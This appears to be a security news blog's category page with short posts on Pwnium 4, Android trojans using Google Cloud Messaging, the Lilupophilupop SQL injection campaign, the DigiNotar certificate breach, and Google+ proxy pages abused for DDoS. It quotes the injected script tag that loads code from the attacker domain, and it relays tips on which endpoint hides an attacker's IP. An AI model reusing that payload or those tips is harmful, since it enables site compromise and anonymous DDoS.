Category: Google Hacking

Jan 26 2014

Google Pwnium 4 Invites Hackers to Attack Chrome OS at CanSecWest

google pwnium 4 Google holds regular competitions to encourage involvement in improving the security of the Chromium project. Contests like Pwnium helps to better patch specific exploits and issues to make Chromium even more secure.

This year Pwnium 4 will once again set sights on Chrome OS, and will be hosted in March at the CanSecWest security conference in Vancouver.

With a total of $2.71828 Million USD in the pot, Pwnium rewards will be issued for eligible Chrome OS exploits at the following levels:

— $110,000 USD: browser or system-level compromise in guest mode or as a logged-in user, delivered via a web page.
— $150,000 USD: compromise with device persistence: guest to guest with interim reboot, delivered via a web page.

Past Pwnium competitions have focused on Intel-based Chrome OS devices, but this year researchers can choose between an ARM-based Chromebook, the HP Chromebook 11 (WiFi), or the Acer C720 Chromebook (2GB WiFi) that is based on the Intel Haswell microarchitecture. The attack must be demonstrated against one of these devices running the then-current stable version of Chrome OS.

Participants need to register in advance for a timeslot. To register, e-mail pwnium4@chromium.org. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014. Only exploits demonstrated on time in this specifically-arranged window will be eligible for a reward.

More Info:
The Chromium Blog : Announcing Pwnium 4 Targeting Chrome OS
Pwnium4@CanSecWest2014 : Official Rules
Chromium OS : Developer Guide

Aug 14 2013

Android Malware Exploiting Google Cloud Messaging Service

Google Cloud Messaging Hacking Researchers have discovered a number of malicious Android apps are using Google’s Cloud Messaging (GCM) service and leveraging it as a command and control server to carry out attacks.

A post on Securelist today by Kaspersky Lab’s Roman Unuchek, breaks down five Trojans that have been spotted checking in with GCM after launching.

  • Trojan-SMS.AndroidOS.FakeInst.a
  • Trojan-SMS.AndroidOS.Agent.ao
  • Trojan-SMS.AndroidOS.OpFake.a
  • Backdoor.AndroidOS.Maxit.a
  • Trojan-SMS.AndroidOS.Agent.az

These trojans having a relatively wide range of functions:

— Sending premium text messages to a specified number
— Sending text messages to a specified number on the contact list
— Performing self-updates
— Stealing text messages
— Deleting incoming text messages that meet the criteria set by the C&C
— Theft of contacts
— Replacing the C&C or GCM numbers
— Stopping or restarting its operations
— Generate shortcuts to malicious sites
— Initiate phone calls
— Collect information about the phone and the SIM card & upload on server

Kaspersky Lab detected millions of installers in over 130 countries and Kaspersky Mobile Security (KMS) blocked attempted installations for these Trojans.

No doubt, GCM is a useful service for legitimate software developers. But virus writers are using Google Cloud Messaging as an additional C&C for their Trojans. Furthermore, the execution of commands received from GCM is performed by the GCM system and it is impossible to block them directly on an infected device.

The only way to cut this channel off from virus writers is to block developer accounts with IDs linked to the registration of malicious programs.

Jan 01 2012

Lilupophilupop SQL Injection Tops 1 Million Infected Pages

Lilupophilupop SQL InjectionA SQL attack which is increasing at extremely fast rates has been uncovered by ISC ( Internet Storm Center ) has seen to raise from just a few hundred pages to over 1 million in just a few weeks.

From the past few weeks of going over submitted results and information from interweb users they have put together some interesting data, one it seems to be targeting windows based servers and from the logs it seems they had been doing a bit of probing around within the weeks before the sites been injected with a special string:

“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>

They have also put together fairly solid base of ccTLD’s statistics of which have been infected (as shown below) -

  • UK – 56,300
  • NL – 123,000
  • DE – 49,700
  • FR – 68,100
  • DK – 31,000
  • CN – 505
  • CA – 16,600
  • COM – 30,500
  • RU – 32,000
  • JP – 23,200
  • ORG – 2,690

At the moment it looks like it is partially automated and partially manual. The manual component and the number of sites infected suggests a reasonable size work force or a long preparation period.

If you want to find out if you have a problem just search for “<script src=”http://lilupophilupop.com/” in google and use the site: parameter to hone in on your domain.

Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM

Aug 30 2011

Hackers Acquire Google Certificate, Could Hijack Gmail Accounts

Hackers have obtained a digital certificate good for any Google website from a Dutch certificate provider.

Google SSL Certificate

Criminals could use the certificate to conduct “man-in-the-middle” attacks targeting users of Gmail, Google’s search engine or any other service.

Attackers could poison DNS, present their site with the fake cert and bingo, they have the user’s credentials.

Man-in-the-middle attacks could also be launched via spam messages with links leading to a site posing as, say, the real Gmail. If recipients surfed to that link, their account login username and password could be hijacked.

Details of the certificate were posted on Pastebin last Saturday.

The SSL certificate is valid, and was issued by DigiNotar, a Dutch certificate authority, or CA.

It’s unclear whether the certificate was obtained because of a lack of oversight by DigiNotar or through a breach of the company’s certificate issuing website.

Given their ties to the government and financial sectors it’s extremely important to find out the scope of the breach as quickly as possible. The situation was reminiscent of a breach last March, when a hacker obtained certificates for some of the Web’s biggest sites, including Google and Gmail, Microsoft, Skype and Yahoo.

Then, Comodo said that nine certificates had been fraudulently issued after attackers used an account assigned to a company partner in southern Europe.

Initially, Comodo argued that Iran’s government may have been involved in the theft. Days later, however, a solo Iranian hacker claimed responsibility for stealing the SSL certificates.

Aug 29 2011

Using Google Servers as a DDoS Tool

Google’s servers can be used by cyber attackers to launch DDoS attacks, claims Simone “R00T_ATI” Quatrini, a penetration tester for Italian security consulting firm AIR Sicurezza.

Google Servers

Quatrini discovered that two vulnerable pages – /_/sharebox/linkpreview/ and gadgets/proxy? – can be used to request any file type, which Google+ will download and show – even if the attacker isn’t logged into Google+.

By making many such request simultaneously – which he managed to do by using a shell script he’s written – he practically used Google’s bandwidth to orchestrate a small DDoS attack against a server he owns.

He points out that his home bandwidth can’t exceed 6Mbps, and that the use of Google’s server resulted in an output bandwidth of at least 91Mbps.

“The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs,” says Quatrini. “But beware: igadgets/proxy? will send your IP in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.”

He says he has discovered the flaws that allow the attack on August 10 and that he contacted Google’s Security center about it. After 19 days of receiving no reply from Google, he published his findings.